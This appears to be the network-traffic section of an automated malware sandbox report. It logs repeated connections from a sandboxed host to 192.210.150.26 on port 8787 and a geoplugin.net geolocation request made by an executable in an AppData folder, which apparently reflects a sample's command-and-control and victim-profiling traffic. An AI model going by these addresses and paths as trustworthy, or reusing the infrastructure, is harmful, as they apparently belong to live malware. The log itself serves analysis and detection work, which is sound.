                                                                          Dec 3, 2024 15:40:15.991383076 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:15.992177963 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:15.992305040 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:15.995587111 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:15.995722055 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:15.995829105 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.000346899 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.000612020 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.000683069 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.004172087 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.004615068 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.004687071 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.007802010 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.008100986 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.008158922 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.012295008 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.012382030 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.012459040 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.016635895 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.016824961 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.016902924 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.021163940 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.021192074 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.021275997 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.025234938 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.025322914 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.025373936 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.029854059 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.029917955 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.030059099 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.033957958 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.034065008 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.034135103 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.038336992 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.038383007 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.038475990 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.042751074 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.043075085 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.043150902 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.047095060 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.047656059 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.047734022 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.051414013 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.052114010 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.052170992 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.055727005 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.055881023 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.055927992 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.060395002 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.061115980 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.062324047 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.065179110 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.065216064 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.065331936 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.069464922 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.069750071 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.070049047 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.073347092 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.073467970 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.073556900 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.077529907 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.077685118 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.077743053 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.081953049 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.082962036 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.083039045 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.086296082 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.086344004 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.086462021 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.090626001 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.090723991 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.090815067 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.095000029 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.095098972 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.095160007 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.200007915 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.200117111 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.200201035 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.201586962 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.201807022 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.201904058 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.204976082 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.205260038 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.205312967 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.208204031 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.211364031 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.211429119 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.212780952 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.213769913 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.213829041 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.216135025 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.216152906 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.216204882 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.218970060 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.218983889 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.219036102 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.221232891 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.221586943 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.221643925 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.224630117 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.225167990 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.225239992 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.227422953 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.227900028 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.227967978 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.231441021 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.232213020 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.232369900 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.234699965 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.234862089 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.234942913 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.237498045 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.237658978 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.238624096 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.240609884 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.241063118 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.242440939 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.243760109 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.244272947 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.246355057 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.246717930 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.247086048 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.249629021 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.249700069 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.249938011 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.249993086 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.253417015 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.253567934 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.253627062 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.255858898 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.255927086 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.256006002 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.258886099 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.259227991 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.259299040 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.261936903 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.262260914 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.262434959 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.265156984 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.266326904 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.266383886 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.267978907 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.268148899 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.268234015 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.271056890 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.271195889 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.271255970 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.274287939 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.274451017 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.274511099 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.277141094 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.277295113 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.277359962 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.280175924 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.280635118 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.280694962 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.283287048 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.283472061 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.283524036 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.286603928 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.286623001 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.286679029 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.290421963 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.290435076 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.290525913 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.293164015 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.295031071 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.295109034 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.297452927 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.297630072 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.297681093 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.298230886 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.298324108 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.299709082 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.636970043 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.637659073 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.637710094 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.637845993 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.638420105 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.638472080 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.638473034 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.639714956 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.639789104 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.639863968 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.640549898 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.640604019 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.640624046 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.641273022 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.641326904 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.641369104 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.642258883 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.642328024 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.642371893 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.643243074 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.643287897 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.643364906 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.644234896 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.644283056 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.644314051 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.645294905 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.645339966 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.645380974 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.646228075 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.646279097 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.646294117 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.647324085 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.647377968 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.647384882 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.648211956 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.648262024 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.648286104 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.649152994 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.649200916 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.649228096 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.650134087 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.650192022 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.650333881 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.650712013 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.651093006 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.651148081 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.651173115 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.652084112 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.652131081 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.652167082 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.653096914 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.653167009 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.653309107 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.654103994 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.654145956 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.654321909 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.655096054 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.655158043 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.655244112 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.655992031 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.656044006 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.656169891 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.657038927 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.657097101 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.657134056 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.658056021 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.658114910 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.658268929 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.658921957 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.658977032 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.659077883 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.660027027 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.660039902 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.660079956 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.660881996 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.660931110 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.660965919 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.662220001 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.662275076 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.662518024 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.663542032 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.663614035 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.663711071 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.664858103 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.664912939 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.665014029 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.665947914 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:16.666008949 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:16.701786995 CET878749703192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:17.582729101 CET8049710178.237.33.50192.168.2.10
                                                                          Dec 3, 2024 15:40:17.584027052 CET4971080192.168.2.10178.237.33.50
                                                                          Dec 3, 2024 15:40:18.672440052 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:18.792651892 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:18.792670012 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:18.792687893 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:18.792696953 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:18.792706966 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:18.792738914 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:18.792758942 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:18.792778969 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:18.792788029 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:18.792824984 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:18.792860985 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:18.913255930 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:18.913296938 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:18.913398027 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:18.913508892 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:18.913654089 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:18.913682938 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:18.914688110 CET878749704192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:18.916254997 CET497048787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:38.447906017 CET878749703192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:40:38.449425936 CET497038787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:40:38.569334984 CET878749703192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:41:08.463756084 CET878749703192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:41:08.465260983 CET497038787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:41:08.585706949 CET878749703192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:41:38.463238001 CET878749703192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:41:38.464993000 CET497038787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:41:38.587575912 CET878749703192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:42:04.989444971 CET4971080192.168.2.10178.237.33.50
                                                                          Dec 3, 2024 15:42:05.317395926 CET4971080192.168.2.10178.237.33.50
                                                                          Dec 3, 2024 15:42:06.020550966 CET4971080192.168.2.10178.237.33.50
                                                                          Dec 3, 2024 15:42:07.317519903 CET4971080192.168.2.10178.237.33.50
                                                                          Dec 3, 2024 15:42:08.463680029 CET878749703192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:42:08.465344906 CET497038787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:42:08.586707115 CET878749703192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:42:09.820159912 CET4971080192.168.2.10178.237.33.50
                                                                          Dec 3, 2024 15:42:14.708101034 CET4971080192.168.2.10178.237.33.50
                                                                          Dec 3, 2024 15:42:24.317421913 CET4971080192.168.2.10178.237.33.50
                                                                          Dec 3, 2024 15:42:38.466481924 CET878749703192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:42:38.469440937 CET497038787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:42:38.589555025 CET878749703192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:43:08.479042053 CET878749703192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:43:08.489214897 CET497038787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:43:08.609319925 CET878749703192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:43:38.494538069 CET878749703192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:43:38.495995998 CET497038787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:43:38.616553068 CET878749703192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:44:08.510426998 CET878749703192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:44:08.511995077 CET497038787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:44:08.632178068 CET878749703192.210.150.26192.168.2.10
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 3, 2024 15:40:15.010523081 CET | 58837 | 53 | 192.168.2.10 | 1.1.1.1
Dec 3, 2024 15:40:15.150598049 CET | 53 | 58837 | 1.1.1.1 | 192.168.2.10
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 3, 2024 15:40:15.010523081 CET | 192.168.2.10 | 1.1.1.1 | 0xe716 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 3, 2024 15:40:15.150598049 CET | 1.1.1.1 | 192.168.2.10 | 0xe716 | No error (0) | geoplugin.net | (none) | 178.237.33.50 | A (IP address) | IN (0x0001) | false
                                                                          • geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49710 | 178.237.33.50 | 80 | 7744 | C:\Users\user\AppData\Local\acceptancy\turbinals.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 15:40:15.279390097 CET | 71 | OUT | GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
Dec 3, 2024 15:40:16.569276094 CET | 1171 | IN | HTTP/1.1 200 OK
                                                                          date: Tue, 03 Dec 2024 14:40:16 GMT
                                                                          server: Apache
                                                                          content-length: 963
                                                                          content-type: application/json; charset=utf-8
                                                                          cache-control: public, max-age=300
                                                                          access-control-allow-origin: *
